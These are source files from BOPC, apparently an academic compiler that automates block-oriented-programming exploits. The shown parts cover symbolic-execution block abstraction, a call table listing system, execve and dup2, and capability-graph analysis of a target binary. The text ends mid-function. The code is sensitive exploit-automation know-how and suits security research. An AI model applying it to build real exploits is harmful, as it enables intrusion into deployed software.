MAKE_RBP_SYMBOLIC: inist.regs.rbp = inist.se.BVS("rbp",64) # keep rbp symbolic else: inist.registers.store('rbp', FRAMEPTR_BASE_ADDR, size=8, endness=archinfo.Endness.LE) # rsp must be concrete and properly initialized inist.registers.store('rsp', RSP_BASE_ADDR, size=8, endness=archinfo.Endness.LE) inist.regs.r8 = inist.se.BVS("r08", 64) inist.regs.r9 = inist.se.BVS("r09", 64) inist.regs.r10 = inist.se.BVS("r10", 64) inist.regs.r11 = inist.se.BVS("r11", 64) inist.regs.r12 = inist.se.BVS("r12", 64) inist.regs.r13 = inist.se.BVS("r13", 64) inist.regs.r14 = inist.se.BVS("r14", 64) inist.regs.r15 = inist.se.BVS("r15", 64) # --------------------------------------------------------------------- # Other initializations # --------------------------------------------------------------------- # map symbolic names to registers # self.__symreg = { self.__getreg(inist, r):r for r in HARDWARE_REGISTERS } self.__symreg = { inist.regs.rax : 'rax', inist.regs.rbx : 'rbx', inist.regs.rcx : 'rcx', inist.regs.rdx : 'rdx', inist.regs.rsi : 'rsi', inist.regs.rdi : 'rdi', inist.regs.rbp : 'rbp', inist.regs.rsp : 'rsp', inist.regs.r8 : 'r8', inist.regs.r9 : 'r9', inist.regs.r10 : 'r10', inist.regs.r11 : 'r11', inist.regs.r12 : 'r12', inist.regs.r13 : 'r13', inist.regs.r14 : 'r14', inist.regs.r15 : 'r15' } # UPDATE: Don't create a symbolic stack, as this consumes all the Virtual Memory and # may crash the machine. By carefully configuring rsp and rbp within the limit of virtual # page limit, we can achieve the same effect, so we don't need a symbolic stack. # # The main issue here are the permissions (stack may not appear as R+W), but as long as # both rsp and rbp point in the same page, there is no problem. # # # # create a symbolic stack (required to have writable pages) # stack = inist.se.BVS("stack", self.__proj.arch.bits * _STACK_SZ) # # # write symbolic stack to memory # # inist.memory.store(inist.regs.sp, stack, endness=archinfo.Endness.LE) # inist.memory.store(STACK_BASE_ADDR, stack, endness=archinfo.Endness.LE) # when solver gives up (in milliseconds) inist.se._solver.timeout = ABSBLK_TIMEOUT*1000 # --------------------------------------------------------------------- # Hooks for identifying dereferences # --------------------------------------------------------------------- self.__callback_mutex = 0 # hooks are enabled inist.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__regwrite_callback) inist.inspect.b('mem_read', when=angr.BP_AFTER, action=self.__memread_callback) # ------------------------------------------------------------------------- # Do the symbolic execution (using simulation managers) # ------------------------------------------------------------------------- simgr = self.__proj.factory.simulation_manager(thing=inist) simgr.save_unconstrained = True # do not discard unconstrained stashes signal.signal(signal.SIGALRM, self.__sig_handler) signal.alarm(ABSBLK_TIMEOUT) # make sure that you execute the normalized block # TODO: cleanup node = ADDR2NODE[self.__entry] num_inst = len(node.instruction_addrs) if node is not None else None if num_inst: simgr.step(num_inst=num_inst) else: simgr.step() # execute 1 basic block signal.alarm(0) # disable alarm if simgr.active: # check if execution was successful newst = simgr.active[0] # get the new state (after execution) elif simgr.unconstrained: # because we execute a single basic block, it's possible to end up in an state that # instruction pointer depends on symbolic data and hence to not know how to proceed # (i.e., unconstrained stash) newst = simgr.unconstrained[0] elif simgr.deadended: # check if execution can't continue (retq) newst = simgr.deadended[0] # work with what you have else: # everything else should generate an error print simgr.stashes raise Exception('There are no usable stashes!') # ------------------------------------------------------------------------- # Analyze results and generate the abstractions # ------------------------------------------------------------------------- self.__reg_w(newst) # analyze register writes self.__mem_r(newst) # analyze memory reads self.__mem_w(newst) # analyze memory writes self.__call(newst) # analyze function/system calls self.__cond(newst) # analyze conditional jumps # ------------------------------------------------------------------------- # Apply (any) patches # # Instructions like 'rep movsq' incorrectly classify rsi and rdi in 'deref' # types. This is because angr assigns a basic block with a single rep* # instruction (as VEX IR contains loops). To fix that, we simply mark the # used registers as clobbering. # ------------------------------------------------------------------------- blk_insns = node.block.capstone.insns # get block instructions if len(blk_insns) == 1 and 'rep' in blk_insns[0].insn.mnemonic: # name = blk_insns[0].insn.insn_name() # get instruction name (w/o the rep*) # make 'rsi', 'rdi' and 'rcx' clobbering (all of them are modified) self.regwr['rdi'] = {'type' : 'clob'} self.regwr['rsi'] = {'type' : 'clob'} self.regwr['rcx'] = {'type' : 'clob'} ''' print print '-------------------- Register Writes --------------------' for a, b in self.regwr.iteritems(): print a, b print '-------------------- Memory Reads --------------------' for a, b in self.memrd: print a, b print '-------------------- Memory Writes --------------------' for a, b in self.memwr: print a, b print '-------------------- Concrete Writes --------------------' for a, b in self.conwr: print a, b print '-------------------- SPL Memory Writes --------------------' for a in self.splmemwr: print a print '-------------------- Calls --------------------' print self.call print '-------------------- Conditional Jumps --------------------' print self.cond ''' # --------------------------------------------------------------------------------------------- # __getitem__(): An alternative way to get block "abstractions". # # :Arg what: The name of the abstraction that you want to get # :Ret: The requested abstraction. # def __getitem__( self, what ): try: return { 'regwr' : self.regwr, 'memrd' : self.memrd, 'memwr' : self.memwr, 'conwr' : self.conwr, 'splmemwr' : self.splmemwr, 'call' : self.call, 'cond' : self.cond, 'symvars' : self.symvars }[ what ] except KeyError: return None # abstraction not found # --------------------------------------------------------------------------------------------- # __iter__(): Iterate over all abstractions. This function is a generator over all possible # abstractions. # # :Ret: Each time function returns a different tuple (name, abstraction). # def __iter__( self ): yield 'regwr', self.regwr yield 'memrd', self.memrd yield 'memwr', self.memwr yield 'conwr', self.conwr yield 'splmemwr', self.splmemwr yield 'call', self.call yield 'cond', self.cond yield 'symvars', self.symvars # ------------------------------------------------------------------------------------------------- ''' if __name__ == '__main__': # DEBUG ONLY import angr project = angr.Project('eval/opensshd/sshd', load_options={'auto_load_libs': False}) # project.analyses.CFGFast() # to prepare project.kb.functions # Problem: Inidirect pointers in .bss: # .text:00000000004050B1 mov rax, cs:public_key # .text:00000000004050B8 mov rdi, [rax+20h] ; value # # abstr = abstract_ng(project, 0x4050B1) # abstr = abstract_ng(project, 0x416610) abstr = abstract_ng(project, 0x416631) # TODO: check me again! abstr = abstract_ng(project, 0x0x40c01f) for a, b in abstr: print '\t', a, b print 'done!' ''' # ------------------------------------------------------------------------------------------------- ================================================ FILE: source/calls.py ================================================ #!/usr/bin/env python2 # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- # # # calls.py # # This module contains all declarations for system and library calls that SPL supports. A call is # declared as a tuple (name, nargs, modregs): # # name : The library/system call name # nargs : The number of its arguments. Set to INFINITY for variadic functions. # modregs : A list of all registers that are modified when the call returns. Note that rax # is always modified as it has the return value. # # To keep the implementation simple, We do not support library calls that take arguments on the # stack. # # Also, it is possible to declare any custom calls that reside in the binary. # ------------------------------------------------------------------------------------------------- from coreutils import * # ------------------------------------------------------------------------------------------------- # Calling Conventions # ------------------------------------------------------------------------------------------------- SYSCALL_CC = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9'] LIBCALL_CC = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9'] # ------------------------------------------------------------------------------------------------- # Supported system calls # ------------------------------------------------------------------------------------------------- syscalls__ = [ # ssize_t read(int fd, void *buf, size_t count) ('read', 3, ['rax', 'rcx', 'r10', 'r11']), # ssize_t write(int fd, const void *buf, size_t count) ('write', 3, ['rax', 'rcx', 'r10', 'r11']), # void *sbrk(intptr_t increment) ('sbrk', 1, ['rax', 'rcx', 'rdx', 'r10', 'r11']), # int brk(void *addr) ('brk', 1, ['rax', 'rcx', 'rdx', 'r10', 'r11']), # int dup(int oldfd) ('dup', 1, ['rax', 'rcx', 'r11']), # int dup2(int oldfd, int newfd) ('dup2', 2, ['rax', 'rcx', 'r10', 'r11']), # unsigned int alarm(unsigned int seconds) ('alarm', 1, ['rax', 'rcx', 'r10', 'r11']), ''' Feel free to append more syscalls... ''' ] # ------------------------------------------------------------------------------------------------- # Supported library calls # ------------------------------------------------------------------------------------------------- libcalls__ = [ # int system(const char *command) ('system', 1, ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']), # int puts(const char *s) ('puts', 1, ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']), # int execve(const char *filename, char *const argv[], char *const envp[]) ('execve', 3, ['rax', 'rcx', 'rdx', 'r10', 'r11']), # int execv(const char *filename, char *const argv[]) ('execv', 2, ['rax', 'rcx', 'rdx', 'r10', 'r11']), # int execl(const char *path, const char *arg, ...); ('execl', 2, ['rax', 'rcx', 'rdx', 'r10', 'r11']), # int printf(const char *format, ...) ('printf', INFINITY, ['rax', 'rcx', 'rdx', 'rsi', 'rdi', 'r8', 'r10', 'r11']), # ssize_t send(int sockfd, const void *buf, size_t len, int flags); # (we can ignore the 4th parameter for now) ('send', 3, []), # void exit(int status) ('exit', 1, []), ''' Feel free to append more libcalls... ''' ] # ------------------------------------------------------------------------------------------------- # In case that you don't want to distinguish them # ------------------------------------------------------------------------------------------------- calls__ = syscalls__ + libcalls__ # ------------------------------------------------------------------------------------------------- # Groups of function calls that have similar effects # ------------------------------------------------------------------------------------------------- call_groups__ = [ ['puts', 'printf'], ['execve', 'execv', 'execl' ], ] # ------------------------------------------------------------------------------------------------- # find_syscall(): Search for a specific system call. # # :Arg name: Name of the syscall # :Ret: If system call exists, function returns the associated entry in syscalls__. Otherwise None # is returned. # def find_syscall( name ): call = filter(lambda call: call[0] == name, syscalls__) if len(call) == 0: return None elif len(call) == 1: return call[0] else: raise Exception("System call '%s' has >1 entries in syscalls__ table." % name) # ------------------------------------------------------------------------------------------------- # find_libcall(): Search for a specific library call. # # :Arg name: Name of the library call # :Ret: If library call exists, function returns the associated entry in libcalls__. Otherwise None # is returned. # def find_libcall( name ): call = filter(lambda call: call[0] == name, libcalls__) if len(call) == 0: return None elif len(call) == 1: return call[0] else: raise Exception("Library call '%s' has >1 entries in libcalls__ table." % name) # ------------------------------------------------------------------------------------------------- # find_call(): Search for a specific call (either library or system) # # :Arg name: Name of the call # :Ret: If call exists, function returns the associated entry in calls__. Otherwise None is # returned. # def find_call( name ): sys = find_syscall(name) lib = find_libcall(name) return sys if sys else lib # logic OR # ------------------------------------------------------------------------------------------------- ================================================ FILE: source/capability.py ================================================ #!/usr/bin/env python2 # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- # # # capability.py # # This module measures the capability of the program. That is, program's capability gives a good # indication, on "what the program is capable of executing" in terms of SPL payloads. However, all # these metrics, aim to identify *upper bounds*; that is, they overestimate the set of SPL programs # that can be truly executed on this binary. # ------------------------------------------------------------------------------------------------- from coreutils import * from calls import * import path as P import networkx as nx import textwrap import datetime import cPickle as pickle import math import numpy # ----------------------------------------------------------------------------- # Capability Options # ----------------------------------------------------------------------------- CAP_ALL = 0x00FF # all types of statements CAP_REGSET = 0x0001 # register assignments CAP_REGMOD = 0x0002 # register modifications CAP_MEMRD = 0x0004 # memory reads CAP_MEMWR = 0x0008 # memory writes CAP_CALL = 0x0010 # system and library calls CAP_COND = 0x0020 # conditional statements CAP_LOAD = 0x0100 # load the capability graph from a file CAP_SAVE = 0x0200 # save the capability graph to a file CAP_NO_EDGE = 0x0400 # don't calculate edges in capability graph # types of analyses CAP_STMT_COMB_CTR = 'STMT_COMB_CTR' # Count combinations of statements CAP_STMT_MIN_DIST = 'STMT_MIN_DIST' # Count min distance between statements CAP_LOOPS = 'LOOPS' # Analyze loops # ------------------------------------------------------------------------------------------------- # capability: This class is responsible for performing several measurements in the target binary. # class capability( object ): ''' ======================================================================================= ''' ''' INTERNAL VARIABLES ''' ''' ======================================================================================= ''' __cap = nx.DiGraph() # the capability graph (CAP) __uid = 0 # a unique ID ''' ======================================================================================= ''' ''' INTERNAL FUNCTIONS ''' ''' ======================================================================================= ''' # --------------------------------------------------------------------------------------------- # __add(): Add a node to the capability graph. # # :Arg addr: Address of the basic block tha contains the statement # :Arg ty: Statement type: regset / regmod / call / cond # :Arg reg: Register name (for regset/regmod/cond) # :Arg val: Statement's value (for regset/regmod/cond) # :Arg mode: Statement mode (const/deref for regset and syscall/libcall for call) # :Arg isW: A flag indicating whether "val" points to a writable address (for regset) # :Arg op: Statement operator (for regmod/cond) # :Arg mem: Memory address (for memrd/memwr) # :Arg name: Function name (for call) # :Ret: None. # def __add( self, addr, ty, reg=None, val=None, mode=None, isW=None, op=None, name=None, mem=None, size=None ): # NOTE: We assume that arguments are not malformed, so we don't do any checks cap = { 'regset' : {'addr':int(addr), 'type':ty, 'reg':reg, 'val':val, '+W':isW, 'mode':mode}, 'regmod' : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val}, 'memrd' : {'addr':int(addr), 'type':ty, 'reg':reg, 'mem':mem, 'size':size}, 'memwr' : {'addr':int(addr), 'type':ty, 'mem':mem, 'val':val, 'size':size}, 'call' : {'addr':int(addr), 'type':ty, 'name':name, 'mode':mode}, 'cond' : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val} }[ ty ] # nicely "switch" the appropriate statement self.__cap.add_node(self.__uid, **cap) # add statement to the graph self.__uid += 1 # update UID counter # --------------------------------------------------------------------------------------------- ''' ======================================================================================= ''' ''' CLASS INTERFACE ''' ''' ======================================================================================= ''' # --------------------------------------------------------------------------------------------- # __init__(): Class constructor. Simply initialize private variables. # # :Arg cfg: Program's CFG. # :Arg name: Program's filename # def __init__( self, cfg, name ): self.__cfg = cfg # save cfg to internal variables self.__name = name # program's filename # --------------------------------------------------------------------------------------------- # build(): Build the Capability Graph. This is a very slow process, so it's possible to save # the graph once its generated, thus without having to re-calculate it the next time. # # :Arg options: An integer that describes how the capability graph should be built. It can be # the logical OR of one or more of the following: # # CAP_ALL | Include all types of statements in the graph # CAP_REGSET | Include register assignments in the graph # CAP_REGMOD | Include register modifications in the graph # CAP_CALL | Include system and library calls in the graph # CAP_COND | Include conditional statements in the graph # CAP_LOAD | Load the capability graph from a file # CAP_SAVE | Save the capability graph to a file # # :Ret: None. # def build( self, options=CAP_ALL ): dbg_prnt(DBG_LVL_1, "Exploring program's capability...") # --------------------------------------------------------------------- # Load Capability Graph from file ? # --------------------------------------------------------------------- if options & CAP_LOAD: dbg_prnt(DBG_LVL_1, "Loading the Capability Graph from file...") try: self.__cap = nx.read_gpickle(self.__name + '.cap') dbg_prnt(DBG_LVL_1, "Done.") return # your job is done here except IOError, err: # if you can't load it, simply re-calculate it ;) error("Cannot load Capability Graph: %s" % str(err)) # --------------------------------------------------------------------- # Iterate over abstracted basic blocks # --------------------------------------------------------------------- dbg_prnt(DBG_LVL_1, "Searching CFG for 'interesting' statements...") nnodes = len(nx.get_node_attributes(self.__cfg.graph, 'abstr').items()) counter = 1 p = P._cfg_shortest_path(self.__cfg) for node, abstr in nx.get_node_attributes(self.__cfg.graph,'abstr').iteritems(): addr = node.addr dbg_prnt(DBG_LVL_3, "Analyzing block at 0x%x (%d/%d)..." % (addr, counter, nnodes)) if options & CAP_REGSET: for reg, data in abstr['regwr'].iteritems(): if data['type'] == 'concrete': self.__add(addr, ty='regset', reg=reg, val=data['const'], mode='const', isW=data['writable']) elif data['type'] == 'deref': self.__add(addr, ty='regset', reg=reg, val=data['addr'], mode='deref') if options & CAP_REGMOD: for reg, data in abstr['regwr'].iteritems(): if data['type'] == 'mod': self.__add(addr, ty='regmod', reg=reg, op=data['op'], val=data['const']) if options & CAP_MEMRD: for reg, data in abstr['regwr'].iteritems(): if data['type'] == 'deref' and data['memrd']: loadreg = data['deps'][0] self.__add(addr, ty='memrd', reg=reg, mem=loadreg, size=data['memrd']) if options & CAP_MEMWR: for memwr in abstr['splmemwr']: self.__add(addr, ty='memwr', mem=memwr['mem'], val=memwr['val'], size=memwr['size']) if options & CAP_CALL and abstr['call'] and find_call(abstr['call']['name']): self.__add(addr, ty='call', name=abstr['call']['name'], mode=abstr['call']['type']) elif options & CAP_COND and abstr['cond']: # elif because we can't have call and cond at the same basic block self.__add(addr, ty='cond', reg=abstr['cond']['reg'], op=abstr['cond']['op'], val=abstr['cond']['const']) ''' # ----------------------------------------------------------------------- # hacky way to quickly find a loop # ----------------------------------------------------------------------- for length, loop in p.k_shortest_loops(addr, 0, 10): length, loop = p.shortest_loop(addr) R = abstr['cond']['reg'] regmod = 0 regset = 0 step = 0 if length < INFINITY: for l in loop[:-1]: try: X = self.__cfg.graph.node[ADDR2NODE[l]]['abstr'] except KeyError: continue for reg, data in X['regwr'].iteritems(): if data['type'] == 'mod' and reg == R: regmod += 1 step = data['const'] elif reg == R: regset += 1 if regmod == 1 and regset == 0: emph(bolds('GOOD LOOP (%d - %d - %s) %s' % (abstr['cond']['const'], step, abstr['cond']['op'], pretty_list(loop)))) # else: # print 'BAD LOOP (mod: %d, set: %d) (%d - %d - %s) %s' % \ # (regmod, regset, abstr['cond']['const'], step, abstr['cond']['op'], # pretty_list(loop)) ''' counter += 1 # update counter dbg_prnt(DBG_LVL_1, "Done.") # --------------------------------------------------------------------- # Show some statistics # --------------------------------------------------------------------- emph("Binary has %s interesting statements:" % bold(self.__cap.order())) stmt_ctr = { 'regset' : 0, 'regmod' : 0, 'memrd' : 0, 'memwr' : 0, 'call' : 0, 'cond' : 0 } for _, data in self.__cap.nodes(data=True): stmt_ctr[ data['type'] ] += 1 # count statements emph("\t%s register assignments" % bold(stmt_ctr['regset'], pad=5)) emph("\t%s register modifications" % bold(stmt_ctr['regmod'], pad=5)) emph("\t%s memory reads " % bold(stmt_ctr['memrd'], pad=5)) emph("\t%s memory writes " % bold(stmt_ctr['memwr'], pad=5)) emph("\t%s system/library calls" % bold(stmt_ctr['call'], pad=5)) emph("\t%s conditional jumps" % bold(stmt_ctr['cond'], pad=5)) # --------------------------------------------------------------------- # Add edges to the Capability Graph # --------------------------------------------------------------------- # don't calculate edges if asked (it's time consuming) if options & CAP_NO_EDGE: dbg_prnt(DBG_LVL_1, "Skipping edge calculation of capability graph.") return dbg_prnt(DBG_LVL_1, "Building the Capability Graph...") # list of node addresses node_list = [ d['addr'] for _, d in self.__cap.nodes_iter(data=True) ] SPT = nx.DiGraph() # create the Shortest Path Tree completed = 0 # % completed csp = P._cfg_shortest_path(self.__cfg) # create the CFG Shortest Path object warn("This can be a very slow process ('-dd' and '-ddd' options show a progress bar)") # for each node u_ in Capability Graph for u_, du in self.__cap.nodes_iter(data=True): v_ = -1 # v_ is the uid of the target node (u_ -> v_) SPT.clear() # clear Shortest Path Tree # Find the shortest paths (in CFG) to every other statement. Unfortunately, shortest # paths in CFG are not like regular shortest paths, as we explain in path.py. Thus we # have to re-calculate all shortest paths for every node in the capability graph. for length, path in csp.shortest_path(du['addr'], node_list): v_ += 1 # the uid of the current node (it's linear) if length == INFINITY: continue # skip nodes with non-existing paths # --------------------------------------------------------------------------------- # Now, if we directly add the edges with shortest path lengths to the capability # graph, we'll have an interesting problem: Consider the path A - x - x - B - x - C # in CFG. The Capability Graph should contain the edges (A, B, 3) and (B, C, 2). # However the naive approach, will also add the edge (A, C, 5) to the graph. The # problem here is that we cannot accurately measure chains of statements due to the # direct edges. # # To fix this issue we build the Shortest Path Tree (SPT). That is, we merge all # shortest paths, into a single graph. The resulting graph will be tree as it # consists only of single source shortest paths (without loops), with all edges # having weight = 1. SPT has two types of nodes: Black and White. Black nodes # contain statements (should appear on capability graph) while White nodes are used # for transitions. The first and the last nodes of each shortest path are Black # while every other node between is White. Our goal is to remove all White nodes # and merge the resulting SPT with the capability graph. # # We remove the White nodes one by one. When we remove a White node, we also update # the weights in SPT. # --------------------------------------------------------------------------------- # add first and last nodes (Black) to the SPT (if already exists, make them Black) SPT.add_nodes_from([path[0], path[-1]], color='Black') # keep track of the statement uids that use this node (map address to UID) SPT.node[path[0] ].setdefault('uid', set()).add(u_) SPT.node[path[-1]].setdefault('uid', set()).add(v_) # convert nodes [1,2,3,4], into edges [(1,2),(2,3),(3,4)] and add them to SPT SPT.add_edges_from(zip(path, path[1:]), weight=1) # color the intermediate nodes White (if they're not Black) for p in path[1:-1]: if 'color' not in SPT.node[p] or SPT.node[p]['color'] != 'Black': SPT.node[p]['color'] = 'White' # iteratively delete the White nodes for n in [node for node, data in SPT.nodes(data=True) if data['color'] == 'White']: # for each pair of (incoming, outgoing) edges for src, _, d1 in SPT.in_edges(n, data=True): for _, dst, d2 in SPT.out_edges(n, data=True): # add a new edge that bypasses the White node SPT.add_edge(src, dst, weight=d1['weight']+d2['weight']) SPT.remove_node(n) # delete White node (along with its edges) ''' at this point, SPT will only contain Black nodes ''' # merge SPT to the capability graph for e1, e2, data in SPT.edges_iter(data=True): # copy it edge-by-edge for u in SPT.node[e1]['uid']: # move from addresses back to UIDs for v in SPT.node[e2]['uid']: if u != v: # that's to avoid self-loops self.__cap.add_edge(u, v, weight=data['weight']) # show current progress (%) percent = math.floor(100. / len(self.__cap) * u_) if completed < percent: completed = percent dbg_prnt(DBG_LVL_2, "%d%% completed" % completed) del SPT # we don't need the SPT anymore dbg_prnt(DBG_LVL_1, "Done. Capability Graph generated successfully.") visualize(self.__cap) # --------------------------------------------------------------------- # Save Capability Graph to a file ? # --------------------------------------------------------------------- if options & CAP_SAVE: dbg_prnt(DBG_LVL_1, "Saving Capability Graph...") try: nx.write_gpickle(self.__cap, self.__name + '.cap') dbg_prnt(DBG_LVL_1, "Done. Capability Graph saved as %s" % self.__name + '.cap') except IOError, err: error("Cannot save Capability Graph: %s" % str(err)) # --------------------------------------------------------------------------------------------- # get(): Return the Capability Graph. Just in case ;) # # :Ret: The Capability Graph # def get( self ): return self.__cap # --------------------------------------------------------------------------------------------- # save(): Save the nodes of the Capability Graph (i.e., the interesting statements) to a file. # # :Ret: None. # def save( self ): now = datetime.datetime.now() # get current timestamp banner = textwrap.dedent("""\ # # This file has been created by BOPC at %s # '%s' has %d interesting statements. Each line shows a statement. # # The columns are: address | type | register | value | mode | +W | operator | name # When an attribute is not available, a dot '.' is presented. # # # Attribute list: # # address : Address of the basic block tha contains the statement # type : Statement type: regset / regmod / call / cond # register : Register name (for regset / regmod / cond) # memory : Memory address (for memrd / memwr) # value : Statement's value (for regset / regmod / cond) # mode : Statement mode (const / deref for regset and syscall / libcall for call) # +W : A flag indicating whether "val" points to a writable address (for regset) # operator : Statement operator (for regmod / cond) # name : Function name (for call) # """ % (now.strftime("%d/%m/%Y %H:%M"), self.__name, self.__cap.order())) dbg_prnt(DBG_LVL_1, "Dumping interesting statments to a file...") try: cap = open(self.__name + '.stmt', 'w') cap.write(banner) # write banner first # write statements one by one for _, d in self.__cap.nodes_iter(data=True): opt = '%10s' % (d['reg'] if 'reg' in d else '.') opt += '%10s' % (d['mem'] if 'mem' in d else '.') opt += ' %32s ' % (d['val'] if 'val' in d else '.') opt += '%10s' % (d['mode'] if 'mode' in d else '.') opt += '%10s' % (d['+W'] if '+W' in d else '.') opt += '%10s' % (d['op'] if 'op' in d else '.') opt += '%16s' % (d['name'] if 'name' in d else '.') opt += '%10s' % (d['size'] if 'size' in d else '.') cap.write( "0x%08x %10s %s\n" % (d['addr'], d['type'], opt) ) cap.close() dbg_prnt(DBG_LVL_1, "Done. Capability Graph saved as %s" % self.__name + '.stmt') except IOError, err: error("Cannot create statements file: %s" % str(err)) # --------------------------------------------------------------------------------------------- # explore(): Explore the Capability Graph and look for "islands". # # :Ret: None. # def explore( self ): dbg_prnt(DBG_LVL_1, "Exploring the Capability Graph...") self.__islands = [] # store islands here n_inslands = 0 # number of islands size, diam = [], [] # size and diameter lists # --------------------------------------------------------------------- # The first step is to extract the "islands" from the Capability Graph, # which are essentially the Strong Connected Components (SCC) of the # undirected version of the graph. # --------------------------------------------------------------------- capU = self.__cap.to_undirected() # make Capability Graph undirected unvisited = set(capU.nodes()) # initially, no node is visited while len(unvisited): # while there are unvisited nodes root = unvisited.pop() # pick a random node unvisited.add( root ) # and remove it from set nodeset = [] # nodes in the current island # explore the island using DFS and obtain the node set for u in nx.dfs_preorder_nodes(capU, root): unvisited.remove(u) # mark u as visited nodeset.append(u) # and add it to node set self.__cap.node[ u ]['island'] = n_inslands # get island as induced (directed) subgraph and relabel nodes in [0, order(G)-1] range graph = self.__cap.subgraph(nodeset) relabel = dict(zip(graph.nodes(), range(graph.order()))) graph = nx.relabel_nodes(graph, relabel) # --------------------------------------------------------------------- # Calculate island's diameter. Although the island is fully connected # in the undirected version, it's not in the directed version. Thus, # nx.diameter(graph) throws an exception. The diameter of the island, # is the longest shortest path between any two nodes. # --------------------------------------------------------------------- D = 0 # island's diameter for n in graph.nodes_iter(): # caclulate all shortest paths from the given node length = nx.single_source_shortest_path_length(graph, n) maxlen = max(length.values()) # get the longest shortest path if D < maxlen: D = maxlen # keep track of the longest among all nodes size.append(len(nodeset)) # island size diam.append( D) # island's diameter self.__islands.append( { # store island's information 'root' : root, 'size' : graph.order(), 'diameter' : D, 'graph' : graph } ) n_inslands += 1 # total # islands dbg_prnt(DBG_LVL_1, "Done.") # --------------------------------------------------------------------- # Show some statistics # --------------------------------------------------------------------- warn("'-dd' and '-ddd' options show the 'size' and 'diameter' lists") emph("Capability Graph has %s islands" % bold(n_inslands)) emph("Island sizes: max = %s, min = %s, avg = %s" % (bold(max(size)), bold(min(size)), bold(1.*sum(size)/n_inslands, 'float'))) dbg_arb(DBG_LVL_2, "Island size list", size) emph("Island diameters: max = %s, min = %s, avg = %s" % (bold(max(diam)), bold(min(diam)), bold(1.*sum(diam)/n_inslands, 'float'))) dbg_arb(DBG_LVL_2, "Island diameter list", diam) # --------------------------------------------------------------------------------------------- # analyze(): Perform various analyses to the islands of the Capability Graph. # # :Arg analyses: The analyses to perform (can be many) # :Ret: None. # def analyze( self, *analyses ): dbg_prnt(DBG_LVL_1, "Analyzing the Capability Graph...") for analysis in analyses: # for every different analysis try: # based on the analysis, select the appropriate function and invoke it func = { CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr, CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist, CAP_LOOPS : self.__analyze_loops }[ analysis ] for island in self.__islands: # perform the analysis to every island func( island['graph'] ) except KeyError, err: fatal('Unknow analysis %s' % str(err)) # --------------------------------------------------------------------------------------------- # analyze_island(): Analyze a specific island. # # :Arg addr: An address of any node of the island # :Arg analyses: The analyses to perform (can be many) # :Ret: None. # def analyze_island( self, addr, *analyses ): # --------------------------------------------------------------------- # Search for the island to analyze # --------------------------------------------------------------------- island_id = -1 for _, d in self.__cap.nodes_iter(data=True): if d['addr'] == addr: island_id = d['island'] break if island_id < 0: fatal("Node '0x%x' does not contained in any island" % addr) dbg_prnt(DBG_LVL_1, "Analyzing the Island %d..." % island_id) # --------------------------------------------------------------------- # Perform the analyses # --------------------------------------------------------------------- for analysis in analyses: # for every different analysis try: # based on the analysis, select the appropriate function and invoke it func = { CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr, CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist, CAP_LOOPS : self.__analyze_loops }[ analysis ] func( self.__islands[ island_id ]['graph'] ) except KeyError, err: fatal('Unknow analysis %s' % str(err)) # --------------------------------------------------------------------------------------------- # callback(): Invoke a callback function for every island. # # :Arg cbfunc: The callback function to invoke # :Ret: None. # def callback( self, cbfunc ): for island in self.__islands: cbfunc( island['graph'] ) # TODO: Move these to private function sections # --------------------------------------------------------------------------------------------- # __analyze_stmt_comb_ctr(): Count the total number of combinations that K SPL statements can # be chained together (repetitions of statements are allowed) on a given island. # # :Arg island: The island graph to work on # :Ret: None. # def __analyze_stmt_comb_ctr( self, island ): dbg_prnt(DBG_LVL_1, "Starting Analysis: Statement Combinations...") # TODO: Check this again. Too many combinations :\ K = 20 # --------------------------------------------------------------------- # Find the total number of paths between any 2 nodes that use exactly # K edges. We calculate that using Dynamic Programming. Let C^k_{ij} be # the total number of paths from i to j with exactly k edges. Then we # have: # # C^0_{ii} = 1, forall i in V # C^k_{ij} = C^1_{ij} = 1, iff (i,j) in E # C^k_{ij} = SUM(C^{k-1}_[xj]), for all x adjacent to i # # We build this table in a bottom-up fashion. Time/Space Complexity is # O(|V|^2 * K). We can improve space complexity by storing only the # last 2 K's (K and K-1). # --------------------------------------------------------------------- C = numpy.zeros((K, island.order(), island.order()), dtype=numpy.int64) for i in range(island.order()): # initialize for K = 0 C[0][i][i] = 1 for 